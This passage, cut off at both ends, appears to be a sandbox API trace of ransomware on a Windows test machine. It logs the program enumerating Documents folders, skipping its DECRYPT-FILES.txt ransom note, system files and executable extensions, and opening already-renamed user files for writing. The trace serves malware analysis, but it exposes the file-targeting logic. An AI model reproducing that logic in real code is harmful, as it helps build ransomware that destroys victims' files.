ftLastWriteTime.dwLowDateTime=0xaeab71e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x4f7b, dwReserved0=0x0, dwReserved1=0x0, cFileName="5jCFbrHSiWDWqLk.ods.cFJP", cAlternateFileName="5JCFBR~1.CFJ")) returned 1 [0185.378] lstrcmpiW (lpString1="5jCFbrHSiWDWqLk.ods.cFJP", lpString2="DECRYPT-FILES.txt") returned -1 [0185.379] lstrcmpiW (lpString1="5jCFbrHSiWDWqLk.ods.cFJP", lpString2="autorun.inf") returned -1 [0185.379] lstrcmpiW (lpString1="5jCFbrHSiWDWqLk.ods.cFJP", lpString2="boot.ini") returned -1 [0185.379] lstrcmpiW (lpString1="5jCFbrHSiWDWqLk.ods.cFJP", lpString2="desktop.ini") returned -1 [0185.379] lstrcmpiW (lpString1="5jCFbrHSiWDWqLk.ods.cFJP", lpString2="ntuser.dat") returned -1 [0185.379] lstrcmpiW (lpString1="5jCFbrHSiWDWqLk.ods.cFJP", lpString2="iconcache.db") returned -1 [0185.379] lstrcmpiW (lpString1="5jCFbrHSiWDWqLk.ods.cFJP", lpString2="bootsect.bak") returned -1 [0185.379] lstrcmpiW (lpString1="5jCFbrHSiWDWqLk.ods.cFJP", lpString2="ntuser.dat.log") returned -1 [0185.379] lstrcmpiW (lpString1="5jCFbrHSiWDWqLk.ods.cFJP", lpString2="thumbs.db") returned -1 [0185.379] lstrcmpiW (lpString1="5jCFbrHSiWDWqLk.ods.cFJP", lpString2="Bootfont.bin") returned -1 [0185.379] lstrlenW (lpString="5jCFbrHSiWDWqLk.ods.cFJP") returned 24 [0185.379] lstrcmpiW (lpString1="cFJP", lpString2="lnk") returned -1 [0185.379] lstrcmpiW (lpString1="cFJP", lpString2="exe") returned -1 [0185.379] lstrcmpiW (lpString1="cFJP", lpString2="sys") returned -1 [0185.379] lstrcmpiW (lpString1="cFJP", lpString2="dll") returned -1 [0185.379] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\") returned 75 [0185.379] lstrlenW (lpString="5jCFbrHSiWDWqLk.ods.cFJP") returned 24 [0185.379] lstrcpyW (in: lpString1=0x36fe7e0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\" [0185.379] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\", lpString2="5jCFbrHSiWDWqLk.ods.cFJP" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\5jCFbrHSiWDWqLk.ods.cFJP") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\5jCFbrHSiWDWqLk.ods.cFJP" [0185.379] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.379] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\5jCFbrHSiWDWqLk.ods.cFJP" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\nardjcaecu74unr7m\\5jcfbrhsiwdwqlk.ods.cfjp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x26c [0185.380] GetFileSizeEx (in: hFile=0x26c, lpFileSize=0x36fdfa8 | out: lpFileSize=0x36fdfa8*=20347) returned 1 [0185.380] CreateFileMappingW (hFile=0x26c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x270 [0185.380] MapViewOfFile (hFileMappingObject=0x270, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0185.380] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0185.380] CloseHandle (hObject=0x270) returned 1 [0185.381] CloseHandle (hObject=0x26c) returned 1 [0185.381] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.381] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaea91080, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaea91080, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaea91080, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0185.381] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0185.381] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ae87f50, ftCreationTime.dwHighDateTime=0x1d4ce7e, ftLastAccessTime.dwLowDateTime=0xddbf07a0, ftLastAccessTime.dwHighDateTime=0x1d4cf7e, ftLastWriteTime.dwLowDateTime=0xaeadd340, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x166a1, dwReserved0=0x0, dwReserved1=0x0, cFileName="puUPAH5A1myMbGOan2W.doc.389K6u", cAlternateFileName="PUUPAH~1.389")) returned 1 [0185.381] lstrcmpiW (lpString1="puUPAH5A1myMbGOan2W.doc.389K6u", lpString2="DECRYPT-FILES.txt") returned 1 [0185.381] lstrcmpiW (lpString1="puUPAH5A1myMbGOan2W.doc.389K6u", lpString2="autorun.inf") returned 1 [0185.381] lstrcmpiW (lpString1="puUPAH5A1myMbGOan2W.doc.389K6u", lpString2="boot.ini") returned 1 [0185.381] lstrcmpiW (lpString1="puUPAH5A1myMbGOan2W.doc.389K6u", lpString2="desktop.ini") returned 1 [0185.381] lstrcmpiW (lpString1="puUPAH5A1myMbGOan2W.doc.389K6u", lpString2="ntuser.dat") returned 1 [0185.381] lstrcmpiW (lpString1="puUPAH5A1myMbGOan2W.doc.389K6u", lpString2="iconcache.db") returned 1 [0185.381] lstrcmpiW (lpString1="puUPAH5A1myMbGOan2W.doc.389K6u", lpString2="bootsect.bak") returned 1 [0185.381] lstrcmpiW (lpString1="puUPAH5A1myMbGOan2W.doc.389K6u", lpString2="ntuser.dat.log") returned 1 [0185.381] lstrcmpiW (lpString1="puUPAH5A1myMbGOan2W.doc.389K6u", lpString2="thumbs.db") returned -1 [0185.381] lstrcmpiW (lpString1="puUPAH5A1myMbGOan2W.doc.389K6u", lpString2="Bootfont.bin") returned 1 [0185.381] lstrlenW (lpString="puUPAH5A1myMbGOan2W.doc.389K6u") returned 30 [0185.381] lstrcmpiW (lpString1="389K6u", lpString2="lnk") returned -1 [0185.381] lstrcmpiW (lpString1="389K6u", lpString2="exe") returned -1 [0185.381] lstrcmpiW (lpString1="389K6u", lpString2="sys") returned -1 [0185.381] lstrcmpiW (lpString1="389K6u", lpString2="dll") returned -1 [0185.381] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\") returned 75 [0185.381] lstrlenW (lpString="puUPAH5A1myMbGOan2W.doc.389K6u") returned 30 [0185.381] lstrcpyW (in: lpString1=0x36fe7e0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\" [0185.381] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\", lpString2="puUPAH5A1myMbGOan2W.doc.389K6u" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\puUPAH5A1myMbGOan2W.doc.389K6u") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\puUPAH5A1myMbGOan2W.doc.389K6u" [0185.381] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.382] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\puUPAH5A1myMbGOan2W.doc.389K6u" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\nardjcaecu74unr7m\\puupah5a1mymbgoan2w.doc.389k6u"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x26c [0185.382] GetFileSizeEx (in: hFile=0x26c, lpFileSize=0x36fdfa8 | out: lpFileSize=0x36fdfa8*=91809) returned 1 [0185.382] CreateFileMappingW (hFile=0x26c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x270 [0185.382] MapViewOfFile (hFileMappingObject=0x270, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0185.383] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0185.383] CloseHandle (hObject=0x270) returned 1 [0185.383] CloseHandle (hObject=0x26c) returned 1 [0185.383] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.383] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2c64e2c0, ftCreationTime.dwHighDateTime=0x1d4cb48, ftLastAccessTime.dwLowDateTime=0x10aef4d0, ftLastAccessTime.dwHighDateTime=0x1d4cdf5, ftLastWriteTime.dwLowDateTime=0xaeb29600, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x11ae2, dwReserved0=0x0, dwReserved1=0x0, cFileName="USQTCeso0O.ods.tmJ7hl", cAlternateFileName="USQTCE~1.TMJ")) returned 1 [0185.383] lstrcmpiW (lpString1="USQTCeso0O.ods.tmJ7hl", lpString2="DECRYPT-FILES.txt") returned 1 [0185.383] lstrcmpiW (lpString1="USQTCeso0O.ods.tmJ7hl", lpString2="autorun.inf") returned 1 [0185.383] lstrcmpiW (lpString1="USQTCeso0O.ods.tmJ7hl", lpString2="boot.ini") returned 1 [0185.383] lstrcmpiW (lpString1="USQTCeso0O.ods.tmJ7hl", lpString2="desktop.ini") returned 1 [0185.383] lstrcmpiW (lpString1="USQTCeso0O.ods.tmJ7hl", lpString2="ntuser.dat") returned 1 [0185.383] lstrcmpiW (lpString1="USQTCeso0O.ods.tmJ7hl", lpString2="iconcache.db") returned 1 [0185.383] lstrcmpiW (lpString1="USQTCeso0O.ods.tmJ7hl", lpString2="bootsect.bak") returned 1 [0185.384] lstrcmpiW (lpString1="USQTCeso0O.ods.tmJ7hl", lpString2="ntuser.dat.log") returned 1 [0185.384] lstrcmpiW (lpString1="USQTCeso0O.ods.tmJ7hl", lpString2="thumbs.db") returned 1 [0185.384] lstrcmpiW (lpString1="USQTCeso0O.ods.tmJ7hl", lpString2="Bootfont.bin") returned 1 [0185.384] lstrlenW (lpString="USQTCeso0O.ods.tmJ7hl") returned 21 [0185.384] lstrcmpiW (lpString1="tmJ7hl", lpString2="lnk") returned 1 [0185.384] lstrcmpiW (lpString1="tmJ7hl", lpString2="exe") returned 1 [0185.384] lstrcmpiW (lpString1="tmJ7hl", lpString2="sys") returned 1 [0185.384] lstrcmpiW (lpString1="tmJ7hl", lpString2="dll") returned 1 [0185.384] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\") returned 75 [0185.384] lstrlenW (lpString="USQTCeso0O.ods.tmJ7hl") returned 21 [0185.384] lstrcpyW (in: lpString1=0x36fe7e0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\" [0185.384] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\", lpString2="USQTCeso0O.ods.tmJ7hl" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\USQTCeso0O.ods.tmJ7hl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\USQTCeso0O.ods.tmJ7hl" [0185.384] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.384] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\USQTCeso0O.ods.tmJ7hl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\nardjcaecu74unr7m\\usqtceso0o.ods.tmj7hl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x26c [0185.384] GetFileSizeEx (in: hFile=0x26c, lpFileSize=0x36fdfa8 | out: lpFileSize=0x36fdfa8*=72418) returned 1 [0185.384] CreateFileMappingW (hFile=0x26c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x270 [0185.384] MapViewOfFile (hFileMappingObject=0x270, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0185.385] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0185.385] CloseHandle (hObject=0x270) returned 1 [0185.385] CloseHandle (hObject=0x26c) returned 1 [0185.385] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.386] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2c64e2c0, ftCreationTime.dwHighDateTime=0x1d4cb48, ftLastAccessTime.dwLowDateTime=0x10aef4d0, ftLastAccessTime.dwHighDateTime=0x1d4cdf5, ftLastWriteTime.dwLowDateTime=0xaeb29600, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x11ae2, dwReserved0=0x0, dwReserved1=0x0, cFileName="USQTCeso0O.ods.tmJ7hl", cAlternateFileName="USQTCE~1.TMJ")) returned 0 [0185.386] FindClose (in: hFindFile=0x4798f8 | out: hFindFile=0x4798f8) returned 1 [0185.386] CloseHandle (hObject=0x264) returned 1 [0185.386] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x46ee7d50, ftCreationTime.dwHighDateTime=0x1d4d4de, ftLastAccessTime.dwLowDateTime=0xe78a1900, ftLastAccessTime.dwHighDateTime=0x1d4d29e, ftLastWriteTime.dwLowDateTime=0xaeb4f760, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xea9e, dwReserved0=0x0, dwReserved1=0x0, cFileName="NWlwXgs0t5N.rtf.5jCNgVE", cAlternateFileName="NWLWXG~1.5JC")) returned 1 [0185.386] lstrcmpiW (lpString1="NWlwXgs0t5N.rtf.5jCNgVE", lpString2="DECRYPT-FILES.txt") returned 1 [0185.386] lstrcmpiW (lpString1="NWlwXgs0t5N.rtf.5jCNgVE", lpString2="autorun.inf") returned 1 [0185.386] lstrcmpiW (lpString1="NWlwXgs0t5N.rtf.5jCNgVE", lpString2="boot.ini") returned 1 [0185.386] lstrcmpiW (lpString1="NWlwXgs0t5N.rtf.5jCNgVE", lpString2="desktop.ini") returned 1 [0185.386] lstrcmpiW (lpString1="NWlwXgs0t5N.rtf.5jCNgVE", lpString2="ntuser.dat") returned 1 [0185.386] lstrcmpiW (lpString1="NWlwXgs0t5N.rtf.5jCNgVE", lpString2="iconcache.db") returned 1 [0185.386] lstrcmpiW (lpString1="NWlwXgs0t5N.rtf.5jCNgVE", lpString2="bootsect.bak") returned 1 [0185.386] lstrcmpiW (lpString1="NWlwXgs0t5N.rtf.5jCNgVE", lpString2="ntuser.dat.log") returned 1 [0185.386] lstrcmpiW (lpString1="NWlwXgs0t5N.rtf.5jCNgVE", lpString2="thumbs.db") returned -1 [0185.386] lstrcmpiW (lpString1="NWlwXgs0t5N.rtf.5jCNgVE", lpString2="Bootfont.bin") returned 1 [0185.386] lstrlenW (lpString="NWlwXgs0t5N.rtf.5jCNgVE") returned 23 [0185.386] lstrcmpiW (lpString1="5jCNgVE", lpString2="lnk") returned -1 [0185.386] lstrcmpiW (lpString1="5jCNgVE", lpString2="exe") returned -1 [0185.386] lstrcmpiW (lpString1="5jCNgVE", lpString2="sys") returned -1 [0185.386] lstrcmpiW (lpString1="5jCNgVE", lpString2="dll") returned -1 [0185.386] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\") returned 57 [0185.386] lstrlenW (lpString="NWlwXgs0t5N.rtf.5jCNgVE") returned 23 [0185.386] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\" [0185.386] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\", lpString2="NWlwXgs0t5N.rtf.5jCNgVE" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\NWlwXgs0t5N.rtf.5jCNgVE") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\NWlwXgs0t5N.rtf.5jCNgVE" [0185.386] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.387] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\NWlwXgs0t5N.rtf.5jCNgVE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\nwlwxgs0t5n.rtf.5jcngve"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0185.387] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=60062) returned 1 [0185.387] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0185.387] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0185.388] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0185.388] CloseHandle (hObject=0x268) returned 1 [0185.388] CloseHandle (hObject=0x264) returned 1 [0185.388] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.388] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1dd0e9a0, ftCreationTime.dwHighDateTime=0x1d4c762, ftLastAccessTime.dwLowDateTime=0x923065b0, ftLastAccessTime.dwHighDateTime=0x1d4d193, ftLastWriteTime.dwLowDateTime=0xaeb9ba20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x13909, dwReserved0=0x0, dwReserved1=0x0, cFileName="TTVsSd4P8.doc.zKpz2HF", cAlternateFileName="TTVSSD~1.ZKP")) returned 1 [0185.388] lstrcmpiW (lpString1="TTVsSd4P8.doc.zKpz2HF", lpString2="DECRYPT-FILES.txt") returned 1 [0185.388] lstrcmpiW (lpString1="TTVsSd4P8.doc.zKpz2HF", lpString2="autorun.inf") returned 1 [0185.388] lstrcmpiW (lpString1="TTVsSd4P8.doc.zKpz2HF", lpString2="boot.ini") returned 1 [0185.388] lstrcmpiW (lpString1="TTVsSd4P8.doc.zKpz2HF", lpString2="desktop.ini") returned 1 [0185.388] lstrcmpiW (lpString1="TTVsSd4P8.doc.zKpz2HF", lpString2="ntuser.dat") returned 1 [0185.388] lstrcmpiW (lpString1="TTVsSd4P8.doc.zKpz2HF", lpString2="iconcache.db") returned 1 [0185.388] lstrcmpiW (lpString1="TTVsSd4P8.doc.zKpz2HF", lpString2="bootsect.bak") returned 1 [0185.388] lstrcmpiW (lpString1="TTVsSd4P8.doc.zKpz2HF", lpString2="ntuser.dat.log") returned 1 [0185.388] lstrcmpiW (lpString1="TTVsSd4P8.doc.zKpz2HF", lpString2="thumbs.db") returned 1 [0185.388] lstrcmpiW (lpString1="TTVsSd4P8.doc.zKpz2HF", lpString2="Bootfont.bin") returned 1 [0185.389] lstrlenW (lpString="TTVsSd4P8.doc.zKpz2HF") returned 21 [0185.389] lstrcmpiW (lpString1="zKpz2HF", lpString2="lnk") returned 1 [0185.389] lstrcmpiW (lpString1="zKpz2HF", lpString2="exe") returned 1 [0185.389] lstrcmpiW (lpString1="zKpz2HF", lpString2="sys") returned 1 [0185.389] lstrcmpiW (lpString1="zKpz2HF", lpString2="dll") returned 1 [0185.389] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\") returned 57 [0185.389] lstrlenW (lpString="TTVsSd4P8.doc.zKpz2HF") returned 21 [0185.389] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\" [0185.389] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\", lpString2="TTVsSd4P8.doc.zKpz2HF" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\TTVsSd4P8.doc.zKpz2HF") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\TTVsSd4P8.doc.zKpz2HF" [0185.389] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.389] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\TTVsSd4P8.doc.zKpz2HF" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\ttvssd4p8.doc.zkpz2hf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0185.389] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=80137) returned 1 [0185.389] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0185.389] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0185.390] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0185.390] CloseHandle (hObject=0x268) returned 1 [0185.390] CloseHandle (hObject=0x264) returned 1 [0185.390] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.391] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4b3ef4d0, ftCreationTime.dwHighDateTime=0x1d4ce11, ftLastAccessTime.dwLowDateTime=0x4dc10e80, ftLastAccessTime.dwHighDateTime=0x1d4d435, ftLastWriteTime.dwLowDateTime=0xaebc1b80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xd4cd, dwReserved0=0x0, dwReserved1=0x0, cFileName="xejZJaZ6j G_Ckr.pptx.aOhK", cAlternateFileName="XEJZJA~1.AOH")) returned 1 [0185.391] lstrcmpiW (lpString1="xejZJaZ6j G_Ckr.pptx.aOhK", lpString2="DECRYPT-FILES.txt") returned 1 [0185.391] lstrcmpiW (lpString1="xejZJaZ6j G_Ckr.pptx.aOhK", lpString2="autorun.inf") returned 1 [0185.391] lstrcmpiW (lpString1="xejZJaZ6j G_Ckr.pptx.aOhK", lpString2="boot.ini") returned 1 [0185.391] lstrcmpiW (lpString1="xejZJaZ6j G_Ckr.pptx.aOhK", lpString2="desktop.ini") returned 1 [0185.391] lstrcmpiW (lpString1="xejZJaZ6j G_Ckr.pptx.aOhK", lpString2="ntuser.dat") returned 1 [0185.391] lstrcmpiW (lpString1="xejZJaZ6j G_Ckr.pptx.aOhK", lpString2="iconcache.db") returned 1 [0185.391] lstrcmpiW (lpString1="xejZJaZ6j G_Ckr.pptx.aOhK", lpString2="bootsect.bak") returned 1 [0185.391] lstrcmpiW (lpString1="xejZJaZ6j G_Ckr.pptx.aOhK", lpString2="ntuser.dat.log") returned 1 [0185.391] lstrcmpiW (lpString1="xejZJaZ6j G_Ckr.pptx.aOhK", lpString2="thumbs.db") returned 1 [0185.391] lstrcmpiW (lpString1="xejZJaZ6j G_Ckr.pptx.aOhK", lpString2="Bootfont.bin") returned 1 [0185.391] lstrlenW (lpString="xejZJaZ6j G_Ckr.pptx.aOhK") returned 25 [0185.391] lstrcmpiW (lpString1="aOhK", lpString2="lnk") returned -1 [0185.391] lstrcmpiW (lpString1="aOhK", lpString2="exe") returned -1 [0185.391] lstrcmpiW (lpString1="aOhK", lpString2="sys") returned -1 [0185.391] lstrcmpiW (lpString1="aOhK", lpString2="dll") returned -1 [0185.391] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\") returned 57 [0185.391] lstrlenW (lpString="xejZJaZ6j G_Ckr.pptx.aOhK") returned 25 [0185.391] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\" [0185.391] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\", lpString2="xejZJaZ6j G_Ckr.pptx.aOhK" | out: lpString1="C:\\Users\\5p5NrGJn0jS 